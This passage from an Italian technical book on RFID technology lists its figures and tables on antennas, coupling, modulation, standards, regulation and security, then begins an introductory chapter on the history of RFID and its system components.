Figura III.2: Accoppiamento induttivo - Simulazione della mutuainduttanza tra l’antenna di un Reader con spire di 25cm di diametroe l’antenna di un TAG passivo con spire di 2,5cm [19] . . . . . . . . . . .144Figura III.3: Tensione nel circuito del Reader con evidenziato ilcontributo per induzione dal TAG . . . . . . . . . . . . . . . . . . . . . . . . . . . .145Figura III.4: Schema di principio del sistema TAG-Readerad accoppiamento induttivo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .145Figura III.5: Onda elettromagnetica . . . . . . . . . . . . . . . . . . . . . . . . . . .147Figura III.6: Accoppiamento elettromagnetico - Simulazionedell’intensità del segnale ricevuto a 915 MHz con il trasmettitoread 1 m di altezza dal suolo, 2 m di distanza da pareti in un localedi dimensioni 10x14x3 m [19] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .148Figura III.7: Principio di funzionamento dei TAG passivi [7] . . . . . .148Figura III.8: Schema di principio del sistema TAG-Readerad accoppiamento elettromagnetico . . . . . . . . . . . . . . . . . . . . . . . . . . .149Figura III.9: Tensione indotta nei TAG induttivi . . . . . . . . . . . . . . . .151Figura III.10: Schema per il calcolo della potenza ricevutadal TAG . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .153Figura III.11: Schema per il calcolo del coefficientedi assorbimento di potenza del TAG, ρT . . . . . . . . . . . . . . . . . . . . . . .154Figura III.12: [61] Coefficienti ρT e ρS al variaredi ZA_TAG=RA_TAG+jXA_TAG . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .158Figura III.13: [61] Coefficiente ρT e indice di modulazione m al variaredi ZA_TAG=RA_TAG+jXA_TAG . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .160Figura III.14: Rettificatore di Greinacher modificato [ 55] . . . . . . . .162Figura III.15: Diagramma di radiazione riportato sull’antenna adipolo di un TAG UHF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .163Figura III.16: Diagrammi di radiazione di un’antenna a dipolo . . . . .163Figura III.17: Schema di costruzione e diagrammi di radiazionedi un’antenna Yagi (usata a volte nei Reader a frequenze elevate) . . .164Figura III.18: Diagramma di radiazione di un TAG UHF conantenna a dipolo – Alien Technology - mod. ALN-9540 . . . . . . . . . . .164Figura III.19: Diagramma di radiazione di un TAG UHF conantenna omnidirezionale – Alien Technology - mod. ALN-9534 . . . .164Figura III.20: Onda EM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .165

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 30

Page 28: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

31 SOMMARIO

Figura III.21: Configurazione a T-match per dipoli e circuito elettricoequivalente dove il rapporto di elevazione di impedenza (1+α) èdipendente dalle sezioni dei due conduttori verticali . . . . . . . . . . . . .167Figura III.22: Carta di adattamento per il T-match in Fig. III.21 nel casodi l=λ/2, w= λ/100, w’= w/3 e ZA=75Ω . . . . . . . . . . . . . . . . . . . . . . .168Figura III.23: Esempio di T-match innestato nel corpo del radiatoreprincipale. Questa antenna è stata proposta per essere arrotolata surulli di carta industriale [77] (cfr. Figura II.11) . . . . . . . . . . . . . . . . .169Figura III.24: Layout dell’adattamento tramite loop accoppiato e suocircuito equivalente. I parametri RA, CA, LA rappresentano il modellodell’elemento radiante in prossimità della sua risonanza serie. . . . . . .169Figura III.25: carta di adattamento per dipoli alimentati con loopaccoppiato (cfr. Fig. III.24), avendo fissato l=λ/2, w= λ/100, w’= w/3 ea=b (loop quadrato) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .170Figura III.26: in alto) Geometria dell’alimentazione tramite slot innestataed esempio di un TAG (dimensioni in [mm]) adatto ad essere posto acontatto con il corpo umano e ad ospitare sensori; In basso) Circuitoequivalente a costanti distribuite. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .171Figura III.27: Carta di adattamento per la slot innestata su un patchquadrato sospeso (Fig. III.26). Dimensioni: l=λ/2 e d=g=λ/150 . . . .171Figura III.28: Geometria di un’antenna filare a meander line.L’irradiazione è principalmente dovuta ai segmenti orizzontali mentre isegmenti verticali introducono effetti capacitivi. La lunghezza complessi-va del filo determina il contributo induttivo alla reattanza. . . . . . . . . .172Figura III.29: Esempi di TAG che includono profili a meander line ealimentazione con T-match e loop. Le dimensioni sono riportate inlunghezza d’onda. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .173Figura III.30: Esempi di TAG a MLA inclusi in un quadrato di lato λ/5,adattati alle impedenze di microchip indicate da un cerchio nero. Lindica la dimensione totale del conduttore, supposto essere in rame.Lo spessore della traccia che forma l’antenna è λ/300. . . . . . . . . . . .174Figura III.31: Antenne ripiegate su piano di massa. Il cerchio bianco indi-ca la posizione del microchip. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .174Figura III.32: Carta di adattamento del TAG IFA coplanare in Fig. III.31,avendo fissato w=λ/4, u= λ/2, a= λ/10 e modificando la lunghezza del

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 31

Page 29: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

32 RFID - Fondamenti di una tecnologia silenziosamente pervasiva

conduttore ripiegato e la posizione di alimentazione. La larghezza dellatraccia con cui è realizzato il conduttore piegato dell’IFA è λ/600. .175Figura III.33: Esempi di TAG PIFA e IFA modificate aventi singolao multipla ripiegatura. Le dimensioni del tag sono indicate comefrazione di lunghezza d’onda. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .175Figura III.34: TAG del tipo IFA e MLA aventi dimensioni (in [mm]) talida adattare le antenne, alla frequenza f=870 MHz, ad un microchip conimpedenza Zchip=15-j450Ω. In ambedue I casi lo spessore della traccia èdi 1mm. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .176Figura III.35: Guadagno massimo, fattore di adattamento in potenza eguadagno realizzato al variare della frequenza per i tag IFA e MLA aven-ti dimensioni non eccedenti un quadrato di lato 5cm. La riga orizzontaleper τGtag =0.5 permette di apprezzare la larghezza di banda dei TAGall’interno della quale la distanza di lettura non scende al disotto del 70%della distanza di attivazione dell’antenna di riferimento avente guadagnorealizzato unitario. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .177Figura III.36: Esempi di geometrie di TAG a doppia frequenza . . . .178Figura III.37: Prototipo in rame di un TAG a slot innestata come in Fig.III.26, progettata per essere posta su di un contenitore riempito di unamiscela liquida simulante le caratteristiche fisiche del corpo umano. Lamisura è realizzata in modalità chip-less con il metodo del piano immagi-ne per cui è necessario realizzare solo metà dell’antenna. Il connettore diinterconnessione dell’antenna al cavo coassiale del VNA si trova al disot-to del piano di massa. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .181Figura III.38: Costruzione geometrica per determinare la lunghezza degliassi dell’ellisoide approssimante la regione di funzionamento del sistemareader-tag in spazio libero. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .189Figura III.39: Potenza ricevuta dal microchip nel caso del modello a dueraggi in presenza di una parete perfettamente conduttrice. Curva (a)interferenza tra il contributo riflesso e quello diretto; curva (b)minima potenza ricevuta. Gli assi hanno scala arbitraria. . . . . . . . . . .190Figura III.40: Massima distanza di lettura per il modello a due raggirispetto a quella in spazio libero. D distanza mutua tra il reader e la pare-te posta difronte ad esso, ampiezza del Γ coefficiente di riflessione. .190Figura III.41: Modello dell’antenna del reader costituito da un array oriz-

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 32

Page 30: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

33 SOMMARIO

zonatale ed uno vertciale di due linee di corrente megnetica uniforme. 192Figura III.42: Direttività e larghezza di fascio del modello dell’antennadel reader al variare del parametro geometrico L. Le curve tratteggiaterappresentano il fitting polinomiale (30). . . . . . . . . . . . . . . . . . . . . . . .193Figura III.43: Tagli sul piano orizzontale (ad 1m dal pavimento) dellaregione di lettura utile nel caso di una stanza delle dimensioni di un uffi-cio (5.5m x 3m x 3m). Il reader posto in (x, y, z) = (0, 1.5, 1)m si assumein interrogazione continua (d=1). Le immagini ombreggiate indicanolaregione ΩU calcolata con il ray tracing. L’ellisse più piccolo delimita laregione proibitaΩF(E0=6V/m) stimata con il modello in spazio libero. Lealtre ellissi delimotano ΩR calcolata con il modello in spazio libero (lineatratteggiata) e con il modello a due raggi (linea continua). . . . . . . . .195Figura III.44: come in Fig. III.43 ma nel caso di una stanza (laboratorio)con dimensioni (5.5m x 6 x 3m) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .195Figura III.45: Foto e modello geometrico di un tipico ambiente dilaboratorio con studenti seduti nella postazione di lavoro (boxombreggiati). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .196Figura III.46: Regione di lettura sul piano orizzontale ad 1m dalpavimento per la stansa laboratorio con l’arredamento ma senza persone.La spiegazione delle ellissi è la stessa di quella di Fig. III.43. . . . . . . .197Figura III.47: Campo elettrico (valore r.m.s.) predetto dal modello diray tracing nella stanza laboratorio in presenza di persone per unaemissione del reader di 3.2W EIRP. . . . . . . . . . . . . . . . . . . . . . . . . . . .197Figura III.48: Regione di lettura sul piano orizzontale ad 1m dal pavimen-to per la stanza laboratorio in presenza di arredamento e di persone.La spiegazione delle ellissi è la stessa di quella di Fig. III.43. . . . . . . .198Figura III.49: Campo elettrico (valore r.m.s.) predetto dal modello di raytracing nella stanza laboratorio in presenza di persone quando l’antennadel reader è posta al centro del soffitto ed emette 1.0W EIRP. . . . . . .198Figura III.50: Regione di lettura sul piano orizzontale (ad 1m dalpavimento) e su un taglio verticale per la stanza laboratorio in presenzadi arredamento e di persone con l’antenna del reader posta sul soffittoed 1W EIRP. La linea tratteggiata indica la regione di lettura previstadal modello in spazio libero. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .198Figura IV.1: I sistemi RFID utilizzano una varietà di tecniche

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 33

Page 31: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

34 RFID - Fondamenti di una tecnologia silenziosamente pervasiva

di codifica. Caratteristiche fondamentali da valutare sono lacomplessità di sincronizzazione e l’intensità della componentea frequenza zero [7] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 204Figura IV.2: TARI [EPCglobal] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .205Figura IV.3: Codifica di Miller per la generazione disottoportanti [EPCglobal] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .206Figura IV.4: La profondità di modulazione (modulation depth)(o equivalentemente l’indice di modulazione), il tempo di salita(rise time) e il tempo di discesa (fall time) sono specificatein modo che il Reader possa alimentare adeguatamente i TAGe leggerne i dati [7] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .207Figura IV.5: Confronto tra DSB-ASK (e SSB-ASK)e PR-ASK [EPCglobal] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .210Figura IV.6: Rivelatore ad inviluppo . . . . . . . . . . . . . . . . . . . . . . . . . . .212Figura IV.7: Confronto tra spettri di segnali con codificheManchester ed NRZ [21] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .212Figura IV.8: Spettri dei segnali di un sistema HF a 13,56 MHze sottoportante distante 212 KHz [4] . . . . . . . . . . . . . . . . . . . . . . . . . .214Figura IV.9: Procedure di comunicazione nei sistemi RFID [21] . . . .217Figura IV.10: Paradosso dell’esplosione dei dati . . . . . . . . . . . . . . . . .220Figura IV.11: Binary Decision Tree, esempio [7] . . . . . . . . . . . . . . . . .221Figura IV.12: ALOHA, esempio [7] . . . . . . . . . . . . . . . . . . . . . . . . . . .221Figura IV.13: Slotted ALOHA, esempio [7] . . . . . . . . . . . . . . . . . . . .221Figura IV.14: Reader portatile legge/scive etichette intelligenti -IP3pro4 - Intermec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .225Figura IV.15: Intervalli di trasmissione . . . . . . . . . . . . . . . . . . . . . . . . .226Figura IV.16: “Duty Cycle” . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .227

Figura V.1: Confronto tra modulazioni tradizionali eda dispersione di spettro . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .233Figura V.2: Modulazioni a dispersione di spettro: tecnica DS . . . . . .234Figura V.3: Modulazioni a dispersione di spettro: tecnica FH . . . . . .235Figura V.4: Segnale impulsivo [43] . . . . . . . . . . . . . . . . . . . . . . . . . . . .237Figura V.5: Distorsione del segnale per cammini multipliin una modulazione DSSS (WiFi 802.11) (a sinistra) ed in una

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 34

Page 32: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

35 SOMMARIO

modulazione UWB (a destra) [27] . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238Figura V.6: Multi-band OFDM: bande di frequenza . . . . . . . . . . . . .241Figura V.7: Multi-band OFDM: intervalli di tempo e frequenzenella trasmissione dei dati (due periodi temporali relativi ad unodei codici TFC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .242Figura V.8: Esempio di sistema UWB – Multispectral Solutions:Ultra Wideband (UWB) system (Digital Active RFID &Tracking)for precision asset tracking and real-time localization . . . . . . . . . . . .243Figura V.9: Applicazione UWB al calcio [http://www.eximia.it] . . . .244Figura V.10: Applicazione UWB all’Hockey [42] . . . . . . . . . . . . . . . .244Figura V.11: TAG attivo compatibile 802.11 – AeroScout, Inc. –Batterie al litio 3,6V (sostituibili); autonomia 2÷3 anniper trasmissione ogni 30 s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .245Figura V.12: TAG attivo compatibile 802.11 – PanGo Networks,Inc. – per applicazioni “real-time asset tracking” . . . . . . . . . . . . . . . .245Figura V.13: TAG passivo a 2,45 Ghz - Intermec Inc. . . . . . . . . . . . .245Figura V.14: Stack architetturale ZigBee [ZigBeeTM Alliance |Copyright © 2004] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .252Figura V.15: Piattaforme hardware vs. Funzioni logiche vs.Applicazioni degli apparati ZigBee [ZigBeeTM Alliance |Copyright © 2004] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .253Figura V.16: Topologia di rete Mesh ZigBee [ZigBeeTMAlliance | Copyright © 2004] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .253Figura V.17: Ruoli e modalità operative degli NFC . . . . . . . . . . . . . . .257Figura V.18: Struttura di un telefono dotato di NFC . . . . . . . . . . . . .258Figura V.19: Schema di principio per la gestione di applicazioniNFC via OTA. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .260Figura V.20: Architettura NFC [NFC Forum] . . . . . . . . . . . . . . . . . .264Figura V.21: Esempi di applicazioni di tipo “Reader mode” . . . . . . .269Figura V.22: Schema di principio della tecnica per realizzaregli “smart poster” . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .270Figura V.23: Esempi di applicazioni di tipo “emulazionecarta contactless” . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .271Figura V.24: Sequenza tipica di operazioni per applicazionidi pagamento . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .273

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 35

Page 33: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

36 RFID - Fondamenti di una tecnologia silenziosamente pervasiva

Figura V.25: Esempi di applicazioni di tipo “NFC pairing” . . . . . . . .275Figura VI.1: Diagramma di stato dei TAG Gen2 [EPCglobal] . . . . .293Figura VI.2: Azioni del Reader sui TAG e stati deiTAG [EPCglobal] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .297Figura VII.1: Regioni nella ripartizione internazionale dellefrequenze stabilita dall’ITU [55]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .303Figura VII.2: Situazione mondiale dell’allocazione e delle potenzemassime ammesse nella banda tra 850 MHz-e 960 MHz. . . . . . . . . . .306Figura VII.3: Racc. ERC: CEPT/DEC 70-03 annessi 1 ed 11 . . . . . .324Figura VIII.1: Tipologie di threat . . . . . . . . . . . . . . . . . . . . . . . . . . . . .342Figura VIII.2: Emulatore di proximity card . . . . . . . . . . . . . . . . . . . .347Figura VIII.3: Car Immobilizer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .347Figura VIII.4: FPGA in parallelo per la rottura” del chipTexas Instruments DST . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .347Figura VIII.5: Sistema per la rottura” del chip TexasInstruments DST . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .347Figura VIII.6: Schema a blocchi del dispositivo RFID Guardian . . .349Figura VIII.7: Circuiteria del dispositivo RFID Guardian . . . . . . . . .349Figura VIII.8: Attacco del terzo estraneo . . . . . . . . . . . . . . . . . . . . . .353Figura VIII.9: Portafogli “sicuri” RFID Blocking Walletwww.difrwear.com … … made of the finest quality leather…… . .357Figura VIII.10: Principali minacce alla privacy dei consumatori . . . .360Figura VIII.11: Reader RFID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .366Figura VIII.12: Esempio di applicazione di funzione hash(SHA-1) [Wikipedia by David Göthberg, Sweden] . . . . . . . . . . . . . . .377Figura VIII.13: Meccanismo senza crittografia per la generazionee condivisione di una chiave segreta.. . . . . . . . . . . . . . . . . . . . . . . . . . .384Figura VIII.14: Sigillo/lucchetto a singolo TAG . . . . . . . . . . . . . . . . .397Figura VIII.15: Sigillo a singolo TAG per contenitori di olio(uso automobilistico) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .397Figura VIII.16: Sigillo con due TAG a 125 kHz , utilizzato conchiave dinamometrica . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .398Figura VIII.17: Esempio di sigillo a doppio TAG . . . . . . . . . . . . . . . .398Figura VIII.18: Sigillo a tre TAG e Reader . . . . . . . . . . . . . . . . . . . . .399Figura VIII.19: Il Lithuanian corridor e l’enclave russa

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 36

Page 34: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

37 SOMMARIO

in Lituania . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .400Figura VIII.20: Sigillo attivo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .401

Figura IX.1: Esempio di EPC di tipo 1 (96 bit) [7]. . . . . . . . . . . . . . .407Figura IX.2: Un comune codice a barrre monodimensionale(Code 39) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .408Figura IX.3: Codice a barre bidimensionale (PDF417) . . . . . . . . . . .409Figura IX.4: Posizione dei campi dati nel codice PDF417(da PDF417 Specification - http://www.morovia.com/education/symbology/pdf417.asp) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .409Figura IX.5: Sistema di lettura per codici bidimensionali . . . . . . . . . .410Figura IX.6: SmartLabel UHF con codice a barremonodimensionale e codice a barre bidimensionale matriciale(UPS code) - Intermec Technologies Corp. . . . . . . . . . . . . . . . . . . . . .415Figura IX.7: “Merkle-Damgård” per realizzare una funzione hash . .419

ELENCO DELLE TABELLE

Tabella I.1: Modelli di threat. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .58Tabella I.2: Confronto tra smart card senza contatto, NFC eTAG RFID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .75Tabella I.3: Confronto di TAG per Frequenzeoperative / Standard. Fonte: [2] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .76Tabella I.4: Confronto di TAG per Frequenze/Prestazioni. . . . . . . . . .77Tabella I.5: “Hit Parade” dei maggiori produttori di chip per TAG RFID;numero di chip prodotti dalle origini ad oggi. Fonte: “RFID Forecasts,Players and Opportunities 2008-2018” (www.IDTechEx.com) datipresentati al convegno TraceID a Milano Aprile 2008 [169] . . . . . . . .83Tabella I.6: Panorama mondiale dell’installazione di TAG, divisiper applicazione Fonte: “RFID Forecasts, Players andOpportunities 2008-2018” (www.IDTechEx.com) dati presentati alconvegno TraceID a Milano Aprile 2008 [169] . . . . . . . . . . . . . . . . . . .85Tabella I.7: Dimensione del mercato globale nel 2006 divise per continen-ti. Fonte: VDC (Venture Development Corporation) . . . . . . . . . . . . . .87

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 37

Page 35: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

38 RFID - Fondamenti di una tecnologia silenziosamente pervasiva

Tabella I.8: Dimensione del mercato globale Location-BasedServices secondo [53] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .88Tabella II.1: Confronto tra TAG passivi, semi-passivi e attivi [4] . . . .98Tabella II.2: Regioni di campo vicino e campo lontanoper differenti frequenze . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .101Tabella II.3: Tecniche di realizzazione delle antenne dei TAG passivi 111Tabella II.4: Tecniche per superare il problema della polarizzazione .125Tabella II.5: Parametri tipici di un sistema in banda UHF media . . .130Tabella III.1: caratteristiche di banda per i TAG IFA e MLAdi Fig. 3-34 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .177Tabella III.2: massima dimensione della regione proibita stimatacon il modello in spazio libero. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .194Tabella III.3: parametri elttromagnetici del laboratorio allafrequenza di 870MHz. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .197Tabella V.1: Confronto tra tecniche di modulazione UWB [50] . . . . .238Tabella V.2: Velocità di trasmissione e modalità operative . . . . . . . . .257Tabella V.3: La penetrazione dell'NFC nel mercato.Fonte: ABI Research . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .278Tabella V.4: Comparazione tra sistemi wireless . . . . . . . . . . . . . . . . . .279

Tabella VI.1: Classi di TAG come definite da EPC sulla basedella memoria del dispositivo e delle capacità di trasmissione. . . . . . .289Tabella VI.2: Standard ISO/IEC 18000. . . . . . . . . . . . . . . . . . . . . . . .291Tabella VI.3: Principali comandi dello standard Gen2 . . . . . . . . . . . .299

Tabella VII.1: Situazione normativa mondiale delle bande UHF . . . .307Tabella VII.2: ERC/REC 70-03 Annesso 9 “Inductive applications”indicando anche “Decisioni” e recepimento in Italia . . . . . . . . . . . . .312Tabella VII.3: Parte prima: ERC/REC 70-03 Annesso 1“Non-specific Short Range Devices”, indicando anche“Decisioni” e recepimento in Italia. . . . . . . . . . . . . . . . . . . . . . . . . . . .314Tabella VII.4: Parte seconda: ERC/REC 70-03 Annesso 1“Non-specific Short Range Devices”, indicando anche “Decisioni”e recepimento in Italia. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .315

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 38

Page 36: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

39 SOMMARIO

Tabella VII.5: ERC/REC 70-03 Annesso 11 “Radio frequencyidentification applications”, indicando anche “Decisioni” . . . . . . . . .318Tabella VII.6: Frequenze, potenze e canalizzazioni previstenella Decisione 2006/804/CE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .319Tabella VII.7: Frequenze, potenze e canalizzazioni previstenella Decisione 2006/771/CE per SRD non specifici . . . . . . . . . . . . .322Tabella VII.8: Frequenze e potenze previste nella Decisione2006/771/CE per Applicazioni induttive . . . . . . . . . . . . . . . . . . . . . .323Tabella VII.9: Decisioni sulle frequenze armonizzate, sullecaratteristiche tecniche e sulle esenzioni dalle licenze individuali . . .325Tabella VII.10: Standard ETSI di riferimento per i sistemi RFID . . .326Tabella VII.11: Allocazione italiana della banda LF (9 kHz-135 kHze bande seguenti) con riferimento alla normativa europea . . . . . . . . .328Tabella VII.12: Allocazione italiana della banda HF (13,56 MHze bande seguenti) con riferimento alla normativa europea . . . . . . . . .329Tabella VII.13: Allocazione italiana della banda UHF 865 ÷ 870 MHz con riferimento alla normativa europea . . . . . . . . . . .332Tabella VIII.1: Effetti sui segnali RF di materiali tipici . . . . . . . . . . . .357Tabella IX.1: Codici a barre monodimensionali; la stampa èrealizzata in scala nella tabella e con la tabella seguente,per il confronto delle dimensioni [http://www.barcodeman.com] . . .411Tabella IX.2: Codici a barre bidimensionali; la stampa èrealizzata in scala nella tabella e con la tabella precedenteper il confronto delle dimensioni; viene evidenziato il “Trade off”tra le tecnologie mono e bidimensionali (corrispondente a10÷20 caratteri) [http://www.barcodeman.com] . . . . . . . . . . . . . . . . .412Tabella IX.3: Confronto tra codici a barre e RFID con EPC. . . . . . .416Tabella IX.4: Funzioni hash crittografiche. . . . . . . . . . . . . . . . . . . . . .420

2-sommario_Ital..qxp:RFID 5-09-2008 17:07 Pagina 39

Page 37: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFIDFondamenti di una tecnologia silenziosamente pervasiva

PARTE I

INTRODUZIONE AGLI RFID

di Paolo Talone, Giuseppe Russo

Franco Musiari, Ubaldo Montanariper l’introduzione e la categorizzazione della tecnologia RFID

Marzio Amadoriper l’analisi dei costi industriali dei TAG

Questa parte si caratterizza come una sezione introduttiva, dedicata al lettorecon meno dimestichezza con le tecnologie RFID.Vengono introdotte tutte le problematiche tecniche che verranno poi appro-fondite nelle altri parti del libro.La parte si presta pertanto anche ad una lettura indipendente dal prosieguodel testo,dopo la quale è possibile passare direttamente alle problematichetecnologiche, regolamentari o di sicurezza.Vengono illustrati: Le nozioni preliminari su TAG, Reader e sistemi RFID Categorizzazione tecnologica degli apparati RFID con classificazione per

standard, frequenze, tecnologie ed applicazioni Applicazioni dei sistemi RFID e sicurezzaCompletano la prima parte alcuni paragrafi dedicati all’aspetto economico: Analisi dei costi industriali della tecnologia RFID Prospettive economiche e di mercato

41-92.qxp:RFID 9-09-2008 10:53 Pagina 41

Page 38: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

NOZIONI PRELIMINARI

GENERALITÀ E STORIA

RFID (Radio Frequency IDentification) sta ad indicare la funzione diidentificazione attraverso una trasmissione a radio frequenza.L’identificazione implica l’assegnazione di un’identità univoca ad un

oggetto che consenta di distinguerlo in modo non ambiguo.Il fine principale di questa tecnologia, pertanto, è di assumere, da parte

di un “identificatore”, informazioni su oggetti, animali o persone identifi-cati, per mezzo di piccoli apparati a radiofrequenza associati ai medesimi.L’assunzione di informazioni è relativa ad operazioni di ricerca, identi-

ficazione, selezione, localizzazione spaziale e tracciamento.Identificatore ed identificato comunicano mediante segnali a radio fre-

quenza, quindi senza necessità di contatto fisico (a differenza, ad esempio,delle carte a banda magnetica) e senza che gli apparati siano né visibili (adifferenza, ad esempio, dei codici a barre), né in visibilità reciproca (non-line-of-sight).L’antenato degli RFID è comunemente riconosciuto nel sistema

“Identification Friend or Foe (IFF)” sviluppato in Inghilterra durante laseconda guerra mondiale (1940). L’apparato a bordo degli aerei alleati,rispondeva, se interrogato, identificando così gli aerei alleati e distinguen-doli da quelli nemici.La tecnologia è poi evoluta in sistemi per seguire la rotta dei carri fer-

roviari, per l’automazione di processo nell’industria automobilistica, perla localizzazione del bestiame e degli animali selvatici, in agricoltura enelle riserve naturali, per l’anti taccheggio nel commercio al minuto, perchiavi e documenti elettronici, ecc.La diffusione dei sistemi RFID è avvenuta principalmente dagli anni ’90 in

poi; attualmente esistono numerose soluzioni commerciali a costi contenuti.Una tecnologia collaterale agli RFID e di grande rilevanza, è costituita

dalle carte senza contatto che alle funzioni di identificazione aggiungonocapacità di effettuare transazioni finanziarie in sicurezza.

PARTE I - INTRODUZIONE AGLI RFID43

I.1

I.1.1

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 43

Page 39: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva44

COMPONENTI DEL SISTEMA

La tecnologia RFID si compone di tre elementi fondamentali:– TAG; un transponder a radiofrequenza di piccole dimensioni costitui-to da un circuito integrato (chip) con funzioni di semplice logica dicontrollo, dotato di memoria, connesso ad un’antenna ed inserito in uncontenitore o incorporato in una etichetta di carta, una Smart Card,una chiave. Il TAG permette la trasmissione di dati a corto raggio senzacontatto fisico. Salvo eccezioni, i dati contenuti nella memoria del TAGsono limitati ad un codice univoco (identificativo).

– Reader; un ricetrasmettitore controllato da un microprocessore edusato per interrogare e ricevere le informazioni in risposta dai TAG.

– Sistema di gestione (Management system − Host system, ecc.);un sistema informativo che, quando esiste, è connesso in rete con iReader. Tale sistema consente, a partire dai codici identificativi prove-nienti dai TAG, di ricavare tutte le informazioni disponibili associateagli oggetti e di gestire tali informazioni per gli scopi dell’applicazione.

I TAG

I TAG (chiamati a volte Trasponder) vengono distinti, in primo luogo, perla gestione delle fonti energetiche. I TAG, infatti, possono essere:- Passiviricavano l’energia per il funzionamento dal segnale proveniente dal

I.1.3

Figura I.1Sistema RFID

I.1.2

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 44

Page 40: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID45

